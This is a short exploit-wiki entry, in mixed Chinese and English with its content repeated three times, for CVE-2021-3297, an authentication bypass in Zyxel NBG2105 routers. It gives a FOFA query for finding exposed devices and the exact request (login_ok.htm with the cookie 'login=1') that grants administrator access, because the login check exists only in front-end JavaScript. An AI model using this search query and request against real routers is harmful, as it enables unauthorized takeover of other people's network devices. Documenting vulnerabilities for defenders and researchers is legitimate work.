CVE-2021-3297_Zyxel_NBG2105_身份驗證繞過漏洞

# CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞/en

==漏洞影響==

Zyxel NBG2105

==FOFA==

app="ZyXEL-NBG2105"

![](/static/pwnwiki/img/Xnip2021-04-06 09-32-28.jpg)

其中前端文件 /js/util_gw.js 存在前端對 Cookie login參數的校驗。

請求如下則會以管理員身份跳轉到 home.htm頁面。


http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;

![](/static/pwnwiki/img/Xnip2021-04-06_09-36-42.jpg )

==Vulnerability Impact==

Zyxel NBG2105

==FOFA==

app="ZyXEL-NBG2105"

![](/static/pwnwiki/img/Xnip2021-04-06 09-32-28.jpg)

The front-end file /js/util_gw.js has the front-end verification of the Cookie login parameter.

請求如下則會以管理員身份跳轉到 home.htm頁面。


http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;

![](/static/pwnwiki/img/Xnip2021-04-06_09-36-42.jpg )

==Vulnerability Impact==

Zyxel NBG2105

==FOFA==

app="ZyXEL-NBG2105"

![](/static/pwnwiki/img/Xnip2021-04-06 09-32-28.jpg)

The front-end file /js/util_gw.js has the front-end verification of the Cookie login parameter.

If you request the following, you will be redirected to the home.htm page as an administrator.


http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;

![](/static/pwnwiki/img/Xnip2021-04-06_09-36-42.jpg )

文章版权归作者所有，未经允许请勿转载。

THE END

CVE-2021-3297_Zyxel_NBG2105_身份驗證繞過漏洞_en